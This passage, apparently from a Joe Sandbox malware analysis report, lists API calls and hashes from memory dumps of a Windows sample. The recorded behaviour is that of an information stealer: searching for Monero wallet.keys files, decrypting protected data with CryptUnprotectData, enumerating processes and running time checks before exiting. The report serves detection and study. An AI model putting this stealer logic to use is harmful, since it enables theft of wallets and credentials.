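        print(name, classify(calls), literal_spacing(calls), locale_query(calls), embedded_strings(calls))
```

                               Run against the three records, the walker's two literals sit 4 bytes apart while the grabber's sit 0xA8 bytes apart, so the two compares are not necessarily the same "." / ".." pair in both places; that difference is the kind of detail worth checking in the 001C1000 dump before naming the second literal. The grabber record is also the only one whose subcall arguments carry a resolved string (\Monero\wallet.keys), which is how the report's own text hints at what the walk is looking for.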
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: /3?$6>7{$QPx_$n\~w$sV/6$wz}_$x8r~
                              • API String ID: 0-2427404793
                              • Opcode ID: f31c853b1f8cee1c12d282b768b29d2c879c20405a108f390363e028f796223d
                              • Instruction ID: 6f60c3bb6d0eab8ba5ff72f62d4f1ca5af30ea093ca3ccfbf8433af73d59e9c0
                              • Opcode Fuzzy Hash: f31c853b1f8cee1c12d282b768b29d2c879c20405a108f390363e028f796223d
                              • Instruction Fuzzy Hash: 3DB208F360C2049FE304AE29DC8567AFBE9EFD4360F16893DEAC4C7744E67598018696
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,001E0D73), ref: 001CE4A2
                              • StrCmpCA.SHLWAPI(?,001E14F8), ref: 001CE4F2
                              • StrCmpCA.SHLWAPI(?,001E14FC), ref: 001CE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001CEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: a8b4c378421adea72428ff6a29da2220fb929a4b69d251a463f0f06e9015c6f0
                              • Instruction ID: 3a6bbf247d11cfd55fd86ad8f296845e6593ee70615a29b4bed862babd161d84
                              • Opcode Fuzzy Hash: a8b4c378421adea72428ff6a29da2220fb929a4b69d251a463f0f06e9015c6f0
                              • Instruction Fuzzy Hash: 8E1246719101549BDB18FB70DCA6EEE7378AF64300FC045AAB50A96291EF306F49CF96
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0Xo$0{y$5Y?$AAn$ans\
                              • API String ID: 0-2700961280
                              • Opcode ID: 62d2f0453f637a77619f8e3f40f9106742d97d71c9a842e9725d7a8f67ce2633
                              • Instruction ID: ae206a1ee0012bd2d37d657e665cffcafee999760eaa9e5bc55b26bbe8dcac71
                              • Opcode Fuzzy Hash: 62d2f0453f637a77619f8e3f40f9106742d97d71c9a842e9725d7a8f67ce2633
                              • Instruction Fuzzy Hash: C4B20AF3A082049FE304AE2DEC8567AFBE9EFD4720F16493DEAC4C7744E93558058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: /!L^$V*?-$]g$bVz>$+y:
                              • API String ID: 0-1154795837
                              • Opcode ID: 74a6d019a9f75718ca3571dfdb8d5d3a892e4daa5c4232de6d00968b2946249f
                              • Instruction ID: 5b5910738b44f93771943fc767533050e4bb51b7b1f63f1fd2c028ef5cd17be7
                              • Opcode Fuzzy Hash: 74a6d019a9f75718ca3571dfdb8d5d3a892e4daa5c4232de6d00968b2946249f
                              • Instruction Fuzzy Hash: 0FA2D3F3608200AFE7146E29EC8577AFBE9EF94720F1A493DEAC4C7740E63558418697
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 001CC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 001CC87C
                              • lstrcat.KERNEL32(?,001E0B46), ref: 001CC943
                              • lstrcat.KERNEL32(?,001E0B47), ref: 001CC957
                              • lstrcat.KERNEL32(?,001E0B4E), ref: 001CC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 1911d7b6d51c62eac726bcd88b82c0d5b2a3ed905d143429b61b082b253184e3
                              • Instruction ID: 5b1f5888ea485de3d4157b1037588bf91de92af5cc62f9fade9c1a2ccb2574dc
                              • Opcode Fuzzy Hash: 1911d7b6d51c62eac726bcd88b82c0d5b2a3ed905d143429b61b082b253184e3
                              • Instruction Fuzzy Hash: 8A415EB590421ADBDB10DF90DD89FFEB7B8BB48704F1045A8E509B6280D7749A84CF96
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 001D696C
                              • sscanf.NTDLL ref: 001D6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001D69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001D69C0
                              • ExitProcess.KERNEL32 ref: 001D69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: a69c39efe0fb7316da4bd483f9e710a28d80b0e0a2bd8714fa610f30df56ad32
                              • Instruction ID: ba96b0b3d86b069de926744f545de427a653afba36feaa7c05b26bc2a1350a4f
                              • Opcode Fuzzy Hash: a69c39efe0fb7316da4bd483f9e710a28d80b0e0a2bd8714fa610f30df56ad32
                              • Instruction Fuzzy Hash: C021CB76D14208AFCF08EFE4D955AEEB7B9BF48304F04852AE406F3250EB345615CBA9
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 001C724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 001C7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001C72A4
                              • LocalFree.KERNEL32(?), ref: 001C72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 96b325f3b2eace8405d8bb3dc8d0bc8fe8500cc9063b822db3174a5cb5f0e1c1
                              • Instruction ID: d261f1ddfd88882f5cb6379a272cd43dd7934c52360cf1151057a43cd4ad3bac
                              • Opcode Fuzzy Hash: 96b325f3b2eace8405d8bb3dc8d0bc8fe8500cc9063b822db3174a5cb5f0e1c1
                              • Instruction Fuzzy Hash: 4D0100B5A40308BBEB14DBD4CD49F9D7778AB44700F108558FB05BB2C0D7B0AA118B69
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001D961E
                              • Process32First.KERNEL32(001E0ACA,00000128), ref: 001D9632
                              • Process32Next.KERNEL32(001E0ACA,00000128), ref: 001D9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 001D965C
                              • CloseHandle.KERNEL32(001E0ACA), ref: 001D967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: d30e3a431c3cda1dcb33abb829e9db12231dbdbf922a965ae2b1413f9e61c2bd
                              • Instruction ID: e71cd0cb5e2e9a2f63f3b9b23596574e4037a720a9c7e49e0701c7134a8d1113
                              • Opcode Fuzzy Hash: d30e3a431c3cda1dcb33abb829e9db12231dbdbf922a965ae2b1413f9e61c2bd
                              • Instruction Fuzzy Hash: 8E010CB5A00308ABDB14DFA5CD48BEDB7F8EB48700F108199A905A7340E734DB50CF51
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2`od$XEm=$^io${8i?
                              • API String ID: 0-410854099
                              • Opcode ID: ede723ac5364e4b9abeea174e8fcbcb40a382e8aed0370e09a7b2ed8da0dc69f
                              • Instruction ID: fe78a25da9c6c0708b6563ecfbf51201552dec6f5dc552e019a10ffb1ffec5e8
                              • Opcode Fuzzy Hash: ede723ac5364e4b9abeea174e8fcbcb40a382e8aed0370e09a7b2ed8da0dc69f
                              • Instruction Fuzzy Hash: B2B207F390C2049FE3046E2DEC8567AFBE9EF94720F1A4A3DEAC483744E67558058697
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,001C5184,40000001,00000000,00000000,?,001C5184), ref: 001D8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: f68e6ad85df6e7ab84f02d33e92a4e7da576ebd8cc43bda30972d881d75a09fa
                              • Instruction ID: a7cf12613b4c50359fef73a6be71865e661c71ca11e12f8b6fcc98fa87c65483
                              • Opcode Fuzzy Hash: f68e6ad85df6e7ab84f02d33e92a4e7da576ebd8cc43bda30972d881d75a09fa
                              • Instruction Fuzzy Hash: E8111575200209BFDB04DF64E884FAB33AAAF89304F109559F919CB350DB35EC51DB64
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,001C4EEE,00000000,?), ref: 001C9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9B2A
                              • LocalFree.KERNEL32(?,?,?,?,001C4EEE,00000000,?), ref: 001C9B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 918366f13810bf1bed43cc75e78be7e4f7a4b6129e403016e904d89bce82778a
                              • Instruction ID: 607cd64af8a8b2a36ecf048b1535d01c43af8dfae916c054589213be2bd32b18
                              • Opcode Fuzzy Hash: 918366f13810bf1bed43cc75e78be7e4f7a4b6129e403016e904d89bce82778a
                              • Instruction Fuzzy Hash: D211A2B5240308BFEB10CF64DD95FAA77B5FB89704F208058F915AB390C7B6A911CB94
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,014AE200,00000000,?,001E0E10,00000000,?,00000000,00000000), ref: 001D7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,014AE200,00000000,?,001E0E10,00000000,?,00000000,00000000,?), ref: 001D7A7D
                              • wsprintfA.USER32 ref: 001D7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: dcfb6508bcaae969f24a71aeee81b4c35530fe27dce560483f899ddd592f6027
                              • Instruction ID: 0b40b9285c37234a04c1b47a21be190a19856535432bc3ba53c8acc7f1b36941
                              • Opcode Fuzzy Hash: dcfb6508bcaae969f24a71aeee81b4c35530fe27dce560483f899ddd592f6027
                              • Instruction Fuzzy Hash: 36118EB1A45218EBEB20DB54DD49FA9B778FB04721F1047AAE90AA32C0D7741A40CF51
                              APIs
                              • CoCreateInstance.COMBASE(001DE118,00000000,00000001,001DE108,00000000), ref: 001D3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001D37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 747a0b9ec02127b3c0747d24b522813899864f981a879e55ee25e355fb44e5aa
                              • Instruction ID: 7f97fe5ee46e4443883450800fb95f9294fe1078f2ebc27362e32e31d16150b9
                              • Opcode Fuzzy Hash: 747a0b9ec02127b3c0747d24b522813899864f981a879e55ee25e355fb44e5aa
                              • Instruction Fuzzy Hash: 7941FB70A00A189FDB24DB58CC95B9BB7B4BB48702F4042D9E618E72D0D771AE85CF51
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 001C9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 001C9BA3
                              • LocalFree.KERNEL32(?), ref: 001C9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 7d60616ea757a475fb58fe0985e9712b15ad581167c225e2c4d7e21e6a433552
                              • Instruction ID: 68814ce776e56c8254655b13ba027a80750c31adbbbf7cd6477148ede6a7211d
                              • Opcode Fuzzy Hash: 7d60616ea757a475fb58fe0985e9712b15ad581167c225e2c4d7e21e6a433552
